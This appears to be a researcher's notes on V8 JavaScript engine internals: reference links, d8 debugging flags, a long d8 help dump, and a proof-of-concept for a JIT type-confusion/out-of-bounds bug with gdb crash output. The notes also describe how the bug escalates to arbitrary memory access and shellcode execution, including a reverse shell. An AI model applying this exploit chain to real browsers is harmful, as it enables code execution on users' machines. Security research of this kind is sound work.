and.. here’s one another note
https://gist.github.com/ofrobots/0bdcab89771221ace68d
another note
http://d.hatena.ne.jp/higepon/20090302/1235970545
http://d.hatena.ne.jp/higepon/20110715/1310685988
http://d.hatena.ne.jp/higepon/20110715/1310686097 *
http://d.hatena.ne.jp/higepon/20110719/1311033028
http://d.hatena.ne.jp/higepon/20110720/1311117346
http://d.hatena.ne.jp/higepon/20110723/1311379108
http://d.hatena.ne.jp/higepon/20110724/1311462752
http://d.hatena.ne.jp/higepon/20110726/1311636664
http://d.hatena.ne.jp/higepon/archive?word=v8
一些调试的东西
https://github.com/danbev/learning-v8
d8 test.js –ignition –print_bytecode (using ignition)
d8 test.js –print-bytecode (using ignition)
导入v8自带的gdbinit,支持打印v8各类型对象内容,比如用于打印 v8 JavaScript object 内容的job
http://www.mouseos.com/x64/doc4.html
https://zhuanlan.zhihu.com/p/25122691
https://github.com/v8/v8/wiki/TurboFan
https://stackoverflow.com/questions/277423/how-can-i-see-the-machine-code-generated-by-v8
http://benediktmeurer.de/2017/03/01/v8-behind-the-scenes-february-edition/
http://blog.csdn.net/sunbxonline/article/details/20311545
https://halbecaf.com/2017/05/24/exploiting-a-v8-oob-write/
function Ctor() {
n = new Set();
}
function Check() {
n.xyz = 0×826852f4;
parseInt();
}
for(var i=0; i<2000; ++i) {
Ctor();
}
for(var i=0; i<2000; ++i) {
Check();
}
Ctor();
Check();
----Stack
Thread 1 "d8" received signal SIGSEGV, Segmentation fault.
[-------------------------------------code-------------------------------------]
0x736e0a <_ZN2v88internal6String14GetFlatContentEv+106>: test ecx,ecx
0×736e0c <_ZN2v88internal6String14GetFlatContentEv+108>:
je 0×736e1a <_ZN2v88internal6String14GetFlatContentEv+122>
0×736e0e <_ZN2v88internal6String14GetFlatContentEv+110>:
mov rdi,QWORD PTR [rdi]
=> 0×736e11 <_ZN2v88internal6String14GetFlatContentEv+113>:
mov rax,QWORD PTR [rdi]
0×736e14 <_ZN2v88internal6String14GetFlatContentEv+116>:
call QWORD PTR [rax+0×20]
0×736e17 <_ZN2v88internal6String14GetFlatContentEv+119>: mov rdi,rax
0×736e1a <_ZN2v88internal6String14GetFlatContentEv+122>: lea rax,[rdi+rbx*2]
0×736e1e <_ZN2v88internal6String14GetFlatContentEv+126>: movabs rcx,0×200000000
[——————————————————————————]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0×0000000000736e11 in v8::internal::String::GetFlatContent() ()
gdb-peda$ print $rdi
$1 = 0×4141414141414141
First Step
Notice that poc.js:5+109 get the address(0×3fd3734c7d89) of PROPERTY_CELL_TYPE , which stores
global variable n . After that, the return of Set Constructor will be writen to n .
In the second loop, Check() will be optimized as this JIT code
Second Step
Start at +35 and +45 , it gets the global variable n , and on +64 , it gets the property cell(pointer to
a FixedArray) of n . On +68 , it gets n’s first property, and on +72 the number 0×826852f4 will be
writen to it.
In addition, v8 use map to identify objects, which is located on the first field of the object. A new Set’s
map is different from a Set with some properties. In general, the optimized JIT code always check the map
of the target objects, and will deoptimize if the map has been changed.
So the problem is that it doesn’t check the map of variable n in this optimized JIT code.
Third Step
After that we call Ctor() once, variable n will be set to the new Set , which has no properties. In
another word, it will point to the Empty FixedArray, which init at beginning of v8’s process.
In addition, if we won’t optimize Ctor() , the Check() function will be deoptimized when global
variable n is changed.
At last we call Check() , the number of 0×826852f4 will be writen to the first element of the Empty
FixedArray, OOB happens!
This bug can trigger by Set , Map , Uint8Array , Uint16Array , etc.
For our poc, v8 confuse the null string’s map to a heap number, and write the double number 0×826852f4
to it, which cause the OneByteString string to be a External String type. So the data of the string is treated
as a pointer.
So far we have the oob r/w on the Empty FixedArray. As I mentioned, Empty FixedArray will be init at the
beginning of process. After this is the null String Object, so we can overwritten the null’s length for
infoleak.
Besides, I use ab = new ArrayBuffer(0×4000); …; {m.e = ab;} to set the address of
ArrayBuffer’s pointer on the String’s content, so I can get the pointer’s address.
We can do three things via this OOB bug.
1. write a small int.
2. write a heap number.
3. write an Object’s pointer
The small int in memory is the value * 2, for v8 use the LSB to identify if it is a pointer or number.
For a heap number, it stores a pointer which point to a double number and in my POC, it is an example of
the heap number write. So we can put an Object’s pointer and use heap number write to overwrite the
structure of this object.
We use this strategy to modify the ArrayBuffer’s length and Buffer pointer, then we can do Arbitrary
read/write.
Finally we read a function’s JIT pointer, write shellcode on it and call it.
The shellcode for Chrome is to call IPC, and for docs is reverse tcp shell.
All supported d8 commands
./d8 --help SSE3=1 SSE4_1=1 SAHF=1 AVX=1 FMA3=1 BMI1=1 BMI2=1 LZCNT=1 POPCNT=1 ATOM=0 Usage: shell [options] -e string execute string in V8 shell [options] file1 file2 ... filek run JavaScript scripts in file1, file2, ..., filek shell [options] shell [options] --shell [file1 file2 ... filek] run an interactive JavaScript shell d8 [options] file1 file2 ... filek d8 [options] d8 [options] --shell [file1 file2 ... filek] run the new debugging shell Options: --experimental_extras (enable code compiled in via v8_experimental_extra_library_files) type: bool default: false --use_strict (enforce strict mode) type: bool default: false --es_staging (enable test-worthy harmony features (for internal use only)) type: bool default: false --harmony (enable all completed harmony features) type: bool default: false --harmony_shipping (enable all shipped harmony features) type: bool default: true --legacy_const (legacy semantics for const in sloppy mode) type: bool default: false --promise_extra (additional V8 Promise functions) type: bool default: true --harmony_object_observe (enable "harmony Object.observe" (in progress)) type: bool default: false --harmony_function_sent (enable "harmony function.sent" (in progress)) type: bool default: false --harmony_sharedarraybuffer (enable "harmony sharedarraybuffer" (in progress)) type: bool default: false --harmony_simd (enable "harmony simd" (in progress)) type: bool default: false --harmony_do_expressions (enable "harmony do-expressions" (in progress)) type: bool default: false --harmony_tailcalls (enable "harmony tail calls" (in progress)) type: bool default: false --harmony_regexp_property (enable "harmony unicode regexp property classes" (in progress)) type: bool default: false --harmony_regexp_lookbehind (enable "harmony regexp lookbehind") type: bool default: false --harmony_instanceof (enable "harmony instanceof support") type: bool default: false --harmony_object_values_entries (enable "harmony Object.values / Object.entries") type: bool default: false --harmony_object_own_property_descriptors (enable "harmony Object.getOwnPropertyDescriptors()") type: bool default: false --harmony_array_prototype_values (enable "harmony Array.prototype.values") type: bool default: true --harmony_function_name (enable "harmony Function name inference") type: bool default: true --harmony_iterator_close (enable "harmony iterator finalization") type: bool default: true --harmony_regexps (enable "harmony regular expression extensions") type: bool default: true --harmony_unicode_regexps (enable "harmony unicode regexps") type: bool default: true --harmony_sloppy (enable "harmony features in sloppy mode") type: bool default: true --harmony_sloppy_let (enable "harmony let in sloppy mode") type: bool default: true --harmony_sloppy_function (enable "harmony sloppy function block scoping") type: bool default: true --harmony_proxies (enable "harmony proxies") type: bool default: true --harmony_reflect (enable "harmony Reflect API") type: bool default: true --harmony_regexp_subclass (enable "harmony regexp subclassing") type: bool default: true --harmony_restrictive_declarations (enable "harmony limitations on sloppy mode function declarations") type: bool default: true --harmony_species (enable "harmony Symbol.species") type: bool default: true --compiled_keyed_generic_loads (use optimizing compiler to generate keyed generic load stubs) type: bool default: false --allocation_site_pretenuring (pretenure with allocation sites) type: bool default: true --trace_pretenuring (trace pretenuring decisions of HAllocate instructions) type: bool default: false --trace_pretenuring_statistics (trace allocation site pretenuring statistics) type: bool default: false --track_fields (track fields with only smi values) type: bool default: true --track_double_fields (track fields with double values) type: bool default: true --track_heap_object_fields (track fields with heap values) type: bool default: true --track_computed_fields (track computed boilerplate fields) type: bool default: true --track_field_types (track field types) type: bool default: true --smi_binop (support smi representation in binary operations) type: bool default: true --optimize_for_size (Enables optimizations which favor memory size over execution speed) type: bool default: false --unbox_double_arrays (automatically unbox arrays of doubles) type: bool default: true --string_slices (use string slices) type: bool default: true --ignition (use ignition interpreter) type: bool default: false --ignition_filter (filter for ignition interpreter) type: string default: * --print_bytecode (print bytecode generated by ignition interpreter) type: bool default: false --trace_ignition (trace the bytecodes executed by the ignition interpreter) type: bool default: false --trace_ignition_codegen (trace the codegen of ignition interpreter bytecode handlers) type: bool default: false --crankshaft (use crankshaft) type: bool default: true --hydrogen_filter (optimization filter) type: string default: * --use_gvn (use hydrogen global value numbering) type: bool default: true --gvn_iterations (maximum number of GVN fix-point iterations) type: int default: 3 --use_canonicalizing (use hydrogen instruction canonicalizing) type: bool default: true --use_inlining (use function inlining) type: bool default: true --use_escape_analysis (use hydrogen escape analysis) type: bool default: true --use_allocation_folding (use allocation folding) type: bool default: true --use_local_allocation_folding (only fold in basic blocks) type: bool default: false --use_write_barrier_elimination (eliminate write barriers targeting allocations in optimized code) type: bool default: true --max_inlining_levels (maximum number of inlining levels) type: int default: 5 --max_inlined_source_size (maximum source size in bytes considered for a single inlining) type: int default: 600 --max_inlined_nodes (maximum number of AST nodes considered for a single inlining) type: int default: 196 --max_inlined_nodes_cumulative (maximum cumulative number of AST nodes considered for inlining) type: int default: 400 --loop_invariant_code_motion (loop invariant code motion) type: bool default: true --fast_math (faster (but maybe less accurate) math functions) type: bool default: true --collect_megamorphic_maps_from_stub_cache (crankshaft harvests type feedback from stub cache) type: bool default: false --hydrogen_stats (print statistics for hydrogen) type: bool default: false --trace_check_elimination (trace check elimination phase) type: bool default: false --trace_environment_liveness (trace liveness of local variable slots) type: bool default: false --trace_hydrogen (trace generated hydrogen to file) type: bool default: false --trace_hydrogen_filter (hydrogen tracing filter) type: string default: * --trace_hydrogen_stubs (trace generated hydrogen for stubs) type: bool default: false --trace_hydrogen_file (trace hydrogen to given file name) type: string default: NULL --trace_phase (trace generated IR for specified phases) type: string default: HLZ --trace_inlining (trace inlining decisions) type: bool default: false --trace_load_elimination (trace load elimination) type: bool default: false --trace_store_elimination (trace store elimination) type: bool default: false --trace_alloc (trace register allocator) type: bool default: false --trace_all_uses (trace all use positions) type: bool default: false --trace_range (trace range analysis) type: bool default: false --trace_gvn (trace global value numbering) type: bool default: false --trace_representation (trace representation types) type: bool default: false --trace_removable_simulates (trace removable simulates) type: bool default: false --trace_escape_analysis (trace hydrogen escape analysis) type: bool default: false --trace_allocation_folding (trace allocation folding) type: bool default: false --trace_track_allocation_sites (trace the tracking of allocation sites) type: bool default: false --trace_migration (trace object migration) type: bool default: false --trace_generalization (trace map generalization) type: bool default: false --stress_pointer_maps (pointer map for every instruction) type: bool default: false --stress_environments (environment for every instruction) type: bool default: false --deopt_every_n_times (deoptimize every n times a deopt point is passed) type: int default: 0 --deopt_every_n_garbage_collections (deoptimize every n garbage collections) type: int default: 0 --print_deopt_stress (print number of possible deopt points) type: bool default: false --trap_on_deopt (put a break point before deoptimizing) type: bool default: false --trap_on_stub_deopt (put a break point before deoptimizing a stub) type: bool default: false --deoptimize_uncommon_cases (deoptimize uncommon cases) type: bool default: true --polymorphic_inlining (polymorphic inlining) type: bool default: true --use_osr (use on-stack replacement) type: bool default: true --array_bounds_checks_elimination (perform array bounds checks elimination) type: bool default: true --trace_bce (trace array bounds check elimination) type: bool default: false --array_bounds_checks_hoisting (perform array bounds checks hoisting) type: bool default: false --array_index_dehoisting (perform array index dehoisting) type: bool default: true --analyze_environment_liveness (analyze liveness of environment slots and zap dead values) type: bool default: true --load_elimination (use load elimination) type: bool default: true --check_elimination (use check elimination) type: bool default: true --store_elimination (use store elimination) type: bool default: false --dead_code_elimination (use dead code elimination) type: bool default: true --fold_constants (use constant folding) type: bool default: true --trace_dead_code_elimination (trace dead code elimination) type: bool default: false --unreachable_code_elimination (eliminate unreachable code) type: bool default: true --trace_osr (trace on-stack replacement) type: bool default: false --stress_runs (number of stress runs) type: int default: 0 --lookup_sample_by_shared (when picking a function to optimize, watch for shared function info, not JSFunction itself) type: bool default: true --flush_optimized_code_cache (flushes the cache of optimized code for closures on every GC) type: bool default: false --inline_construct (inline constructor calls) type: bool default: true --inline_arguments (inline functions with arguments object) type: bool default: true --inline_accessors (inline JavaScript accessors) type: bool default: true --escape_analysis_iterations (maximum number of escape analysis fix-point iterations) type: int default: 2 --concurrent_recompilation (optimizing hot functions asynchronously on a separate thread) type: bool default: true --trace_concurrent_recompilation (track concurrent recompilation) type: bool default: false --concurrent_recompilation_queue_length (the length of the concurrent compilation queue) type: int default: 8 --concurrent_recompilation_delay (artificial compilation delay in ms) type: int default: 0 --block_concurrent_recompilation (block queued jobs until released) type: bool default: false --omit_map_checks_for_leaf_maps (do not emit check maps for constant values that have a leaf map, deoptimize the optimized code if the layout of the maps changes.) type: bool default: true --turbo (enable TurboFan compiler) type: bool default: false --turbo_shipping (enable TurboFan compiler on subset) type: bool default: true --turbo_greedy_regalloc (use the greedy register allocator) type: bool default: false --turbo_sp_frame_access (use stack pointer-relative access to frame wherever possible) type: bool default: false --turbo_preprocess_ranges (run pre-register allocation heuristics) type: bool default: true --turbo_loop_stackcheck (enable stack checks in loops) type: bool default: true --turbo_filter (optimization filter for TurboFan compiler) type: string default: ~~ --trace_turbo (trace generated TurboFan IR) type: bool default: false --trace_turbo_graph (trace generated TurboFan graphs) type: bool default: false --trace_turbo_cfg_file (trace turbo cfg graph (for C1 visualizer) to a given file name) type: string default: NULL --trace_turbo_types (trace TurboFan's types) type: bool default: true --trace_turbo_scheduler (trace TurboFan's scheduler) type: bool default: false --trace_turbo_reduction (trace TurboFan's various reducers) type: bool default: false --trace_turbo_jt (trace TurboFan's jump threading) type: bool default: false --trace_turbo_ceq (trace TurboFan's control equivalence) type: bool default: false --turbo_asm (enable TurboFan for asm.js code) type: bool default: true --turbo_asm_deoptimization (enable deoptimization in TurboFan for asm.js code) type: bool default: false --turbo_verify (verify TurboFan graphs at each phase) type: bool default: true --turbo_stats (print TurboFan statistics) type: bool default: false --turbo_splitting (split nodes during scheduling in TurboFan) type: bool default: true --turbo_types (use typed lowering in TurboFan) type: bool default: true --turbo_source_positions (track source code positions when building TurboFan IR) type: bool default: false --function_context_specialization (enable function context specialization in TurboFan) type: bool default: false --native_context_specialization (enable native context specialization in TurboFan) type: bool default: true --turbo_inlining (enable inlining in TurboFan) type: bool default: true --trace_turbo_inlining (trace TurboFan inlining) type: bool default: false --loop_assignment_analysis (perform loop assignment analysis) type: bool default: true --turbo_profiling (enable profiling in TurboFan) type: bool default: false --turbo_verify_allocation (verify register allocation in TurboFan) type: bool default: true --turbo_move_optimization (optimize gap moves in TurboFan) type: bool default: true --turbo_jt (enable jump threading in TurboFan) type: bool default: true --turbo_osr (enable OSR in TurboFan) type: bool default: true --turbo_stress_loop_peeling (stress loop peeling optimization) type: bool default: false --turbo_cf_optimization (optimize control flow in TurboFan) type: bool default: true --turbo_frame_elision (elide frames in TurboFan) type: bool default: true --turbo_cache_shared_code (cache context-independent code) type: bool default: true --turbo_preserve_shared_code (keep context-independent code) type: bool default: false --turbo_escape (enable escape analysis) type: bool default: false --turbo_instruction_scheduling (enable instruction scheduling in TurboFan) type: bool default: false --turbo_stress_instruction_scheduling (randomly schedule instructions to stress dependency tracking) type: bool default: false --expose_wasm (expose WASM interface to JavaScript) type: bool default: false --trace_wasm_encoder (trace encoding of wasm code) type: bool default: false --trace_wasm_decoder (trace decoding of wasm code) type: bool default: false --trace_wasm_decode_time (trace decoding time of wasm code) type: bool default: false --trace_wasm_compiler (trace compiling of wasm code) type: bool default: false --trace_wasm_ast (dump AST after WASM decode) type: bool default: false --wasm_break_on_decoder_error (debug break when wasm decoder encounters an error) type: bool default: false --wasm_loop_assignment_analysis (perform loop assignment analysis for WASM) type: bool default: false --enable_simd_asmjs (enable SIMD.js in asm.js stdlib) type: bool default: false --dump_asmjs_wasm (dump Asm.js to WASM module bytes) type: bool default: false --asmjs_wasm_dumpfile (file to dump asm wasm conversion result to) type: string default: asmjs.wasm --typed_array_max_size_in_heap (threshold for in-heap typed array) type: int default: 64 --frame_count (number of stack frames inspected by the profiler) type: int default: 1 --interrupt_budget (execution budget before interrupt is triggered) type: int default: 6144 --type_info_threshold (percentage of ICs that must have type info to allow optimization) type: int default: 25 --generic_ic_threshold (max percentage of megamorphic/generic ICs to allow optimization) type: int default: 30 --self_opt_count (call count before self-optimization) type: int default: 130 --trace_opt_verbose (extra verbose compilation tracing) type: bool default: false --debug_code (generate extra code (assertions) for debugging) type: bool default: false --code_comments (emit comments in code disassembly) type: bool default: false --enable_sse3 (enable use of SSE3 instructions if available) type: bool default: true --enable_sse4_1 (enable use of SSE4.1 instructions if available) type: bool default: true --enable_sahf (enable use of SAHF instruction if available (X64 only)) type: bool default: true --enable_avx (enable use of AVX instructions if available) type: bool default: true --enable_fma3 (enable use of FMA3 instructions if available) type: bool default: true --enable_bmi1 (enable use of BMI1 instructions if available) type: bool default: true --enable_bmi2 (enable use of BMI2 instructions if available) type: bool default: true --enable_lzcnt (enable use of LZCNT instruction if available) type: bool default: true --enable_popcnt (enable use of POPCNT instruction if available) type: bool default: true --enable_vfp3 (enable use of VFP3 instructions if available) type: bool default: true --enable_armv7 (enable use of ARMv7 instructions if available (ARM only)) type: bool default: true --enable_armv8 (enable use of ARMv8 instructions if available (ARM 32-bit only)) type: bool default: true --enable_neon (enable use of NEON instructions if available (ARM only)) type: bool default: true --enable_sudiv (enable use of SDIV and UDIV instructions if available (ARM only)) type: bool default: true --enable_mls (enable use of MLS instructions if available (ARM only)) type: bool default: true --enable_movw_movt (enable loading 32-bit constant by means of movw/movt instruction pairs (ARM only)) type: bool default: false --enable_unaligned_accesses (enable unaligned accesses for ARMv7 (ARM only)) type: bool default: true --enable_32dregs (enable use of d16-d31 registers on ARM - this requires VFP3) type: bool default: true --enable_vldr_imm (enable use of constant pools for double immediate (ARM only)) type: bool default: false --force_long_branches (force all emitted branches to be in long mode (MIPS/PPC only)) type: bool default: false --mcpu (enable optimization for specific cpu) type: string default: auto --expose_natives_as (expose natives in global object) type: string default: NULL --expose_debug_as (expose debug in global object) type: string default: NULL --expose_free_buffer (expose freeBuffer extension) type: bool default: false --expose_gc (expose gc extension) type: bool default: false --expose_gc_as (expose gc extension under the specified name) type: string default: NULL --expose_externalize_string (expose externalize string extension) type: bool default: false --expose_trigger_failure (expose trigger-failure extension) type: bool default: false --stack_trace_limit (number of stack frames to capture) type: int default: 10 --builtins_in_stack_traces (show built-in functions in stack traces) type: bool default: false --disable_native_files (disable builtin natives files) type: bool default: false --inline_new (use fast inline allocation) type: bool default: true --trace_codegen (print name of functions for which code is generated) type: bool default: false --trace (trace function calls) type: bool default: false --mask_constants_with_cookie (use random jit cookie to mask large constants) type: bool default: true --lazy (use lazy compilation) type: bool default: true --trace_opt (trace lazy optimization) type: bool default: false --trace_opt_stats (trace lazy optimization statistics) type: bool default: false --opt (use adaptive optimizations) type: bool default: true --always_opt (always try to optimize functions) type: bool default: false --always_osr (always try to OSR functions) type: bool default: false --prepare_always_opt (prepare for turning on always opt) type: bool default: false --trace_deopt (trace optimize function deoptimization) type: bool default: false --trace_stub_failures (trace deoptimization of generated code stubs) type: bool default: false --serialize_toplevel (enable caching of toplevel scripts) type: bool default: true --serialize_eager (compile eagerly when caching scripts) type: bool default: false --serialize_age_code (pre age code in the code cache) type: bool default: false --trace_serializer (print code serializer trace) type: bool default: false --min_preparse_length (minimum length for automatic enable preparsing) type: int default: 1024 --max_opt_count (maximum number of optimization attempts before giving up.) type: int default: 10 --compilation_cache (enable compilation cache) type: bool default: true --cache_prototype_transitions (cache prototype transitions) type: bool default: true --cpu_profiler_sampling_interval (CPU profiler sampling interval in microseconds) type: int default: 1000 --trace_js_array_abuse (trace out-of-bounds accesses to JS arrays) type: bool default: false --trace_external_array_abuse (trace out-of-bounds-accesses to external arrays) type: bool default: false --trace_array_abuse (trace out-of-bounds accesses to all arrays) type: bool default: false --debug_eval_readonly_locals (do not update locals after debug-evaluate) type: bool default: true --trace_debug_json (trace debugging JSON request/response) type: bool default: false --enable_liveedit (enable liveedit experimental feature) type: bool default: true --hard_abort (abort by crashing) type: bool default: true --stack_size (default size of stack region v8 is allowed to use (in kBytes)) type: int default: 984 --max_stack_trace_source_length (maximum length of function source code printed in a stack trace.) type: int default: 300 --always_inline_smi_code (always inline smi code in non-opt code) type: bool default: false --verify_operand_stack_depth (emit debug code that verifies the static tracking of the operand stack depth) type: bool default: false --min_semi_space_size (min size of a semi-space (in MBytes), the new space consists of twosemi-spaces) type: int default: 0 --max_semi_space_size (max size of a semi-space (in MBytes), the new space consists of twosemi-spaces) type: int default: 0 --semi_space_growth_factor (factor by which to grow the new space) type: int default: 2 --experimental_new_space_growth_heuristic (Grow the new space based on the percentage of survivors instead of their absolute value.) type: bool default: false --max_old_space_size (max size of the old space (in Mbytes)) type: int default: 0 --initial_old_space_size (initial old space size (in Mbytes)) type: int default: 0 --max_executable_size (max size of executable memory (in Mbytes)) type: int default: 0 --gc_global (always perform global GCs) type: bool default: false --gc_interval (garbage collect after <n> allocations) type: int default: -1 --retain_maps_for_n_gc (keeps maps alive for <n> old space garbage collections) type: int default: 2 --trace_gc (print one trace line following each garbage collection) type: bool default: false --trace_gc_nvp (print one detailed trace line in name=value format after each garbage collection) type: bool default: false --trace_gc_ignore_scavenger (do not print trace line after scavenger collection) type: bool default: false --trace_idle_notification (print one trace line following each idle notification) type: bool default: false --trace_idle_notification_verbose (prints the heap state used by the idle notification) type: bool default: false --print_cumulative_gc_stat (print cumulative GC statistics in name=value format on exit) type: bool default: false --print_max_heap_committed (print statistics of the maximum memory committed for the heap in name=value format on exit) type: bool default: false --trace_gc_verbose (print more details following each garbage collection) type: bool default: false --trace_allocation_stack_interval (print stack trace after <n> free-list allocations) type: int default: -1 --trace_fragmentation (report fragmentation for old space) type: bool default: false --trace_fragmentation_verbose (report fragmentation for old space (detailed)) type: bool default: false --trace_mutator_utilization (print mutator utilization, allocation speed, gc speed) type: bool default: false --weak_embedded_maps_in_optimized_code (make maps embedded in optimized code weak) type: bool default: true --weak_embedded_objects_in_optimized_code (make objects embedded in optimized code weak) type: bool default: true --flush_code (flush code that we expect not to use again) type: bool default: true --trace_code_flushing (trace code flushing progress) type: bool default: false --age_code (track un-executed functions to age code and flush only old code (required for code flushing)) type: bool default: true --incremental_marking (use incremental marking) type: bool default: true --min_progress_during_incremental_marking_finalization (keep finalizing incremental marking as long as we discover at least this many unmarked objects) type: int default: 32 --max_incremental_marking_finalization_rounds (at most try this many times to finalize incremental marking) type: int default: 3 --black_allocation (use black allocation) type: bool default: false --concurrent_sweeping (use concurrent sweeping) type: bool default: true --parallel_compaction (use parallel compaction) type: bool default: true --parallel_pointer_update (use parallel pointer update during compaction) type: bool default: true --trace_incremental_marking (trace progress of the incremental marking) type: bool default: false --track_gc_object_stats (track object counts and memory usage) type: bool default: false --trace_gc_object_stats (trace object counts and memory usage) type: bool default: false --track_detached_contexts (track native contexts that are expected to be garbage collected) type: bool default: true --trace_detached_contexts (trace native contexts that are expected to be garbage collected) type: bool default: false --verify_heap (verify heap pointers before and after GC) type: bool default: false --move_object_start (enable moving of object starts) type: bool default: true --memory_reducer (use memory reducer) type: bool default: true --scavenge_reclaim_unmodified_objects (remove unmodified and unreferenced objects) type: bool default: false --heap_growing_percent (specifies heap growing factor as (1 + heap_growing_percent/100)) type: int default: 0 --histogram_interval (time interval in ms for aggregating memory histograms) type: int default: 600000 --trace_object_groups (print object groups detected during each garbage collection) type: bool default: false --heap_profiler_trace_objects (Dump heap object allocations/movements/size_updates) type: bool default: false --sampling_heap_profiler_suppress_randomness (Use constant sample intervals to eliminate test flakiness) type: bool default: false --use_idle_notification (Use idle notification to reduce memory footprint.) type: bool default: true --use_ic (use inline caching) type: bool default: true --trace_ic (trace inline cache state transitions) type: bool default: false --native_code_counters (generate extra code for manipulating stats counters) type: bool default: false --always_compact (Perform compaction on every full GC) type: bool default: false --never_compact (Never perform compaction on full GC - testing only) type: bool default: false --compact_code_space (Compact code space on full collections) type: bool default: true --cleanup_code_caches_at_gc (Flush inline caches prior to mark compact collection and flush code caches in maps during mark compact cycle.) type: bool default: true --use_marking_progress_bar (Use a progress bar to scan large objects in increments when incremental marking is active.) type: bool default: true --zap_code_space (Zap free memory in code space with 0xCC while sweeping.) type: bool default: true --random_seed (Default seed for initializing random generator (0, the default, means to use system random).) type: int default: 0 --trace_weak_arrays (Trace WeakFixedArray usage) type: bool default: false --track_prototype_users (Keep track of which maps refer to a given prototype object) type: bool default: false --trace_prototype_users (Trace updates to prototype user tracking) type: bool default: false --eliminate_prototype_chain_checks (Collapse prototype chain checks into single-cell checks) type: bool default: true --use_verbose_printer (allows verbose printing) type: bool default: true --trace_for_in_enumerate (Trace for-in enumerate slow-paths) type: bool default: false --trace_maps (trace map creation) type: bool default: false --allow_natives_syntax (allow natives syntax) type: bool default: false --trace_parse (trace parsing and preparsing) type: bool default: false --trace_sim (Trace simulator execution) type: bool default: false --debug_sim (Enable debugging the simulator) type: bool default: false --check_icache (Check icache flushes in ARM and MIPS simulator) type: bool default: false --stop_sim_at (Simulator stop after x number of instructions) type: int default: 0 --sim_stack_alignment (Stack alingment in bytes in simulator (4 or 8, 8 is default)) type: int default: 8 --sim_stack_size (Stack size of the ARM64, MIPS64 and PPC64 simulator in kBytes (default is 2 MB)) type: int default: 2048 --log_regs_modified (When logging register values, only print modified registers.) type: bool default: true --log_colour (When logging, try to use coloured output.) type: bool default: true --ignore_asm_unimplemented_break (Don't break for ASM_UNIMPLEMENTED_BREAK macros.) type: bool default: false --trace_sim_messages (Trace simulator debug messages. Implied by --trace-sim.) type: bool default: false --stack_trace_on_illegal (print stack trace when an illegal exception is thrown) type: bool default: false --abort_on_uncaught_exception (abort program (dump core) when an uncaught exception is thrown) type: bool default: false --randomize_hashes (randomize hashes to avoid predictable hash collisions (with snapshots this option cannot override the baked-in seed)) type: bool default: true --hash_seed (Fixed seed to use to hash property keys (0 means random)(with snapshots this option cannot override the baked-in seed)) type: int default: 0 --runtime_call_stats (report runtime call counts and times) type: bool default: false --profile_deserialization (Print the time it takes to deserialize the snapshot.) type: bool default: false --serialization_statistics (Collect statistics on serialized objects.) type: bool default: false --regexp_optimization (generate optimized regexp code) type: bool default: true --testing_bool_flag (testing_bool_flag) type: bool default: true --testing_maybe_bool_flag (testing_maybe_bool_flag) type: maybe_bool default: unset --testing_int_flag (testing_int_flag) type: int default: 13 --testing_float_flag (float-flag) type: float default: 2.5 --testing_string_flag (string-flag) type: string default: Hello, world! --testing_prng_seed (Seed used for threading test randomness) type: int default: 42 --testing_serialization_file (file in which to serialize heap) type: string default: /tmp/serdes --startup_src (Write V8 startup as C++ src. (mksnapshot only)) type: string default: NULL --startup_blob (Write V8 startup blob file. (mksnapshot only)) type: string default: NULL --profile_hydrogen_code_stub_compilation (Print the time it takes to lazily compile hydrogen code stubs.) type: bool default: false --predictable (enable predictable mode) type: bool default: false --force_marking_deque_overflows (force overflows of marking deque by reducing it's size to 64 words) type: bool default: false --stress_compaction (stress the GC compactor to flush out bugs (implies --force_marking_deque_overflows)) type: bool default: false --manual_evacuation_candidates_selection (Test mode only flag. It allows an unit test to select evacuation candidates pages (requires --stress_compaction).) type: bool default: false --external_allocation_limit_incremental_time (Time spent in incremental marking steps (in ms) once the external allocation limit is reached) type: int default: 1 --disable_old_api_accessors (Disable old-style API accessors whose setters trigger through the prototype chain) type: bool default: false --help (Print usage message, including flags, on console) type: bool default: true --dump_counters (Dump counters on exit) type: bool default: false --map_counters (Map counters to a file) type: string default: --js_arguments (Pass all remaining arguments to the script. Alias for "--".) type: arguments default: --gdbjit (enable GDBJIT interface) type: bool default: false --gdbjit_full (enable GDBJIT interface for all code objects) type: bool default: false --gdbjit_dump (dump elf objects with debug info to disk) type: bool default: false --gdbjit_dump_filter (dump only objects containing this substring) type: string default: --enable_slow_asserts (enable asserts that are slow to execute) type: bool default: false --print_source (pretty print source code) type: bool default: false --print_builtin_source (pretty print source code for builtins) type: bool default: false --print_ast (print source AST) type: bool default: false --print_builtin_ast (print source AST for builtins) type: bool default: false --trap_on_abort (replace aborts by breakpoints) type: bool default: false --print_builtin_scopes (print scopes for builtins) type: bool default: false --print_scopes (print scopes) type: bool default: false --trace_contexts (trace contexts operations) type: bool default: false --gc_verbose (print stuff during garbage collection) type: bool default: false --heap_stats (report heap statistics before and after GC) type: bool default: false --code_stats (report code statistics after GC) type: bool default: false --print_handles (report handles after GC) type: bool default: false --check_handle_count (Check that there are not too many handles at GC) type: bool default: false --print_global_handles (report global handles after GC) type: bool default: false --print_turbo_replay (print C++ code to recreate TurboFan graphs) type: bool default: false --trace_turbo_escape (enable tracing in escape analysis) type: bool default: false --trace_normalization (prints when objects are turned into dictionaries.) type: bool default: false --trace_lazy (trace lazy compilation) type: bool default: false --collect_heap_spill_statistics (report heap spill statistics along with heap_stats (requires heap_stats)) type: bool default: false --trace_live_bytes (trace incrementing and resetting of live bytes) type: bool default: false --trace_isolates (trace isolate state changes) type: bool default: false --regexp_possessive_quantifier (enable possessive quantifier syntax for testing) type: bool default: false --trace_regexp_bytecodes (trace regexp bytecode execution) type: bool default: false --trace_regexp_assembler (trace regexp macro assembler calls.) type: bool default: false --trace_regexp_parser (trace regexp parsing) type: bool default: false --print_break_location (print source location on debug break) type: bool default: false --log (Minimal logging (no API, code, GC, suspect, or handles samples).) type: bool default: false --log_all (Log all events to the log file.) type: bool default: false --log_api (Log API events to the log file.) type: bool default: false --log_code (Log code events to the log file without profiling.) type: bool default: false --log_gc (Log heap samples on garbage collection for the hp2ps tool.) type: bool default: false --log_handles (Log global handle events.) type: bool default: false --log_snapshot_positions (log positions of (de)serialized objects in the snapshot.) type: bool default: false --log_suspect (Log suspect operations.) type: bool default: false --prof (Log statistical profiling information (implies --log-code).) type: bool default: false --prof_cpp (Like --prof, but ignore generated code.) type: bool default: false --prof_browser_mode (Used with --prof, turns on browser-compatible mode for profiling.) type: bool default: true --log_regexp (Log regular expression execution.) type: bool default: false --logfile (Specify the name of the log file.) type: string default: v8.log --logfile_per_isolate (Separate log files for each isolate.) type: bool default: true --ll_prof (Enable low-level linux profiler.) type: bool default: false 